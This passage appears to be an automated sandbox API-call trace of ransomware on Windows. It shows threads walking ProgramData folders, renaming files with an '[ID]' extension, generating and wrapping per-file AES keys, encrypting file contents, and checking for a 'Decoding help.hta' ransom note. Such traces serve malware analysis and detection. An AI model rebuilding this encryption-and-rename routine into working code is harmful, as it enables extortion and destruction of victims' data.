dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.028] WriteFile (in: hFile=0x568, lpBuffer=0x1639fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1639fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1639fbe4*, lpNumberOfBytesWritten=0x1639fcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.029] WriteFile (in: hFile=0x568, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1639fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1639fcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.029] CloseHandle (hObject=0x568) returned 1 [0043.033] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\IdentityCRL\\ppcrlui.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.033] FindNextFileW (in: hFindFile=0x671870, lpFindFileData=0x1639fd30 | out: lpFindFileData=0x1639fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd582ef5d, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd582ef5d, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x6ac4ff3f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3e108, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppcrlui.dll", cAlternateFileName="")) returned 0 [0043.033] FindClose (in: hFindFile=0x671870 | out: hFindFile=0x671870) returned 1 Thread: id = 333 os_tid = 0x660 [0042.798] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Media Player\\*.*", lpFindFileData=0x164dfd30 | out: lpFindFileData=0x164dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3ee349fc, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3ee349fc, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db2f8 [0042.798] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.798] FindNextFileW (in: hFindFile=0x5db2f8, lpFindFileData=0x164dfd30 | out: lpFindFileData=0x164dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3ee349fc, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3ee349fc, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.798] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.798] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.798] FindNextFileW (in: hFindFile=0x5db2f8, lpFindFileData=0x164dfd30 | out: lpFindFileData=0x164dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ee349fc, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3ee349fc, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3ee349fc, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0042.798] FindClose (in: hFindFile=0x5db2f8 | out: hFindFile=0x5db2f8) returned 1 Thread: id = 334 os_tid = 0x32c [0042.816] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*.*", lpFindFileData=0x1661fd30 | out: lpFindFileData=0x1661fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x223c9fb0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x223c9fb0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8b90 [0042.816] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.816] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x1661fd30 | out: lpFindFileData=0x1661fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x223c9fb0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x223c9fb0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.816] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.816] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.816] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x1661fd30 | out: lpFindFileData=0x1661fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Active.GRL.[ID]g9uZrLhJaygpwRm1[ID]", cAlternateFileName="")) returned 1 [0042.817] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*.*" [0042.817] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*.*") returned 39 [0042.817] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Decoding help.hta" [0042.817] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\mf\\decoding help.hta")) returned 0x1 [0042.817] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Active.GRL.[ID]g9uZrLhJaygpwRm1[ID]") returned 1 [0042.817] lstrlenW (lpString="Active.GRL.[ID]g9uZrLhJaygpwRm1[ID]") returned 35 [0042.817] lstrcmpiW (lpString1="[ID]", lpString2="[ID]") returned 0 [0042.817] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x1661fd30 | out: lpFindFileData=0x1661fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x223c9fb0, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x223c9fb0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x223c9fb0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x78e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 1 [0042.817] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*.*" [0042.817] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*.*") returned 39 [0042.817] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Decoding help.hta" [0042.817] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\mf\\decoding help.hta")) returned 0x1 [0042.817] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Decoding help.hta") returned 0 [0042.817] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x1661fd30 | out: lpFindFileData=0x1661fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pending.GRL", cAlternateFileName="")) returned 1 [0042.817] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*.*" [0042.817] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*.*") returned 39 [0042.817] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Decoding help.hta" [0042.817] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\mf\\decoding help.hta")) returned 0x1 [0042.817] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Pending.GRL") returned -1 [0042.817] lstrlenW (lpString="Pending.GRL") returned 11 [0042.817] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*.*" [0042.817] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\*.*") returned 39 [0042.818] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\", lpString2="Pending.GRL" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL" [0042.818] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL" [0042.818] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL.[ID]g9uZrLhJaygpwRm1[ID]" [0042.818] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL" (normalized: "c:\\users\\all users\\microsoft\\mf\\pending.grl"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\mf\\pending.grl.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\mf\\pending.grl.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6a0 [0042.818] CreateFileMappingA (hFile=0x6a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x658 [0042.818] CryptAcquireContextA (in: phProv=0x1661fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1661fcec*=0x3448b60) returned 1 [0042.819] CryptGenKey (in: hProv=0x3448b60, Algid=0x6610, dwFlags=0x1, phKey=0x1661fce8 | out: phKey=0x1661fce8*=0x6718b0) returned 1 [0042.819] CryptExportKey (in: hKey=0x6718b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1661fbe4, pdwDataLen=0x1661fce4 | out: pbData=0x1661fbe4*, pdwDataLen=0x1661fce4*=0x2c) returned 1 [0042.819] MapViewOfFile (hFileMappingObject=0x658, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3a60) returned 0x8b90000 [0042.835] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1661fbe4*, pdwDataLen=0x1661fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1661fbe4*, pdwDataLen=0x1661fcf8*=0x100) returned 1 [0042.835] CryptEncrypt (in: hKey=0x6718b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8b90000, pdwDataLen=0x1661fce4*=0x3a60, dwBufLen=0x3a60 | out: pbData=0x8b90000*, pdwDataLen=0x1661fce4*=0x3a60) returned 1 [0042.835] UnmapViewOfFile (lpBaseAddress=0x8b90000) returned 1 [0042.837] CloseHandle (hObject=0x658) returned 1 [0042.837] CryptDestroyKey (hKey=0x6718b0) returned 1 [0042.837] CryptReleaseContext (hProv=0x3448b60, dwFlags=0x0) returned 1 [0042.837] SetFilePointerEx (in: hFile=0x6a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.837] WriteFile (in: hFile=0x6a0, lpBuffer=0x1661fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1661fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1661fbe4*, lpNumberOfBytesWritten=0x1661fcf8*=0x100, lpOverlapped=0x0) returned 1 [0042.838] WriteFile (in: hFile=0x6a0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1661fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1661fcf8*=0x500, lpOverlapped=0x0) returned 1 [0042.838] CloseHandle (hObject=0x6a0) returned 1 [0042.839] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MF\\Pending.GRL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0042.840] FindNextFileW (in: hFindFile=0x5d8b90, lpFindFileData=0x1661fd30 | out: lpFindFileData=0x1661fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pending.GRL", cAlternateFileName="")) returned 0 [0042.840] FindClose (in: hFindFile=0x5d8b90 | out: hFindFile=0x5d8b90) returned 1 Thread: id = 335 os_tid = 0x604 [0042.833] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\*.*", lpFindFileData=0x1675fd30 | out: lpFindFileData=0x1675fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6714f0 [0042.833] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.833] FindNextFileW (in: hFindFile=0x6714f0, lpFindFileData=0x1675fd30 | out: lpFindFileData=0x1675fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.833] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.833] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.833] FindNextFileW (in: hFindFile=0x6714f0, lpFindFileData=0x1675fd30 | out: lpFindFileData=0x1675fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="8.0", cAlternateFileName="")) returned 1 [0042.834] lstrcmpW (lpString1=".", lpString2="8.0") returned -1 [0042.834] lstrcmpW (lpString1="..", lpString2="8.0") returned -1 [0042.834] lstrcmpiW (lpString1="windows", lpString2="8.0") returned 1 [0042.834] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\*.*" [0042.834] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\*.*") returned 41 [0042.834] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\", lpString2="8.0" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\8.0") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\8.0" [0042.834] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\8.0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\8.0\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\MSDN\\8.0\\*.*" [0042.834] GlobalMemoryStatus (in: lpBuffer=0x1675fd10 | out: lpBuffer=0x1675fd10) [0042.834] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f30ee8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x700 [0042.858] CloseHandle (hObject=0x700) returned 1 [0042.858] FindNextFileW (in: hFindFile=0x6714f0, lpFindFileData=0x1675fd30 | out: lpFindFileData=0x1675fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="8.0", cAlternateFileName="")) returned 0 [0042.858] FindClose (in: hFindFile=0x6714f0 | out: hFindFile=0x6714f0) returned 1 Thread: id = 336 os_tid = 0x328 [0043.850] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\*.*", lpFindFileData=0x1689fd30 | out: lpFindFileData=0x1689fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da378 [0043.851] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.851] FindNextFileW (in: hFindFile=0x5da378, lpFindFileData=0x1689fd30 | out: lpFindFileData=0x1689fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.851] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.851] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.851] FindNextFileW (in: hFindFile=0x5da378, lpFindFileData=0x1689fd30 | out: lpFindFileData=0x1689fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BreadcrumbStore", cAlternateFileName="BREADC~1")) returned 1 [0043.851] lstrcmpW (lpString1=".", lpString2="BreadcrumbStore") returned -1 [0043.851] lstrcmpW (lpString1="..", lpString2="BreadcrumbStore") returned -1 [0043.851] lstrcmpiW (lpString1="windows", lpString2="BreadcrumbStore") returned 1 [0043.851] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\*.*" [0043.851] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\*.*") returned 49 [0043.851] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\", lpString2="BreadcrumbStore" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore" [0043.851] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*.*" [0043.851] GlobalMemoryStatus (in: lpBuffer=0x1689fd10 | out: lpBuffer=0x1689fd10) [0043.995] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x95b1bb0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x318 [0044.124] CloseHandle (hObject=0x318) returned 1 [0044.124] FindNextFileW (in: hFindFile=0x5da378, lpFindFileData=0x1689fd30 | out: lpFindFileData=0x1689fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BreadcrumbStore", cAlternateFileName="BREADC~1")) returned 0 [0044.124] FindClose (in: hFindFile=0x5da378 | out: hFindFile=0x5da378) returned 1 Thread: id = 337 os_tid = 0x240 [0042.856] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\*.*", lpFindFileData=0x169dfd30 | out: lpFindFileData=0x169dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db338 [0042.856] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.856] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x169dfd30 | out: lpFindFileData=0x169dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x3fc949a4, ftLastAccessTime.dwHighDateTime=0x1ca0445, ftLastWriteTime.dwLowDateTime=0x3fc949a4, ftLastWriteTime.dwHighDateTime=0x1ca0445, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.857] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.857] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.857] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x169dfd30 | out: lpFindFileData=0x169dfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0xa8f17049, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x243448f1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0", cAlternateFileName="")) returned 1 [0042.857] lstrcmpW (lpString1=".", lpString2="1.0") returned -1 [0042.857] lstrcmpW (lpString1="..", lpString2="1.0") returned -1 [0042.857] lstrcmpiW (lpString1="windows", lpString2="1.0") returned 1 [0042.857] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\*.*" [0042.857] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\*.*") returned 50 [0042.857] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\", lpString2="1.0" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0" [0042.857] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\*.*" [0042.857] GlobalMemoryStatus (in: lpBuffer=0x169dfd10 | out: lpBuffer=0x169dfd10) [0042.857] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x109d0a08, dwCreationFlags=0x0, lpThreadId=0x0 | out: 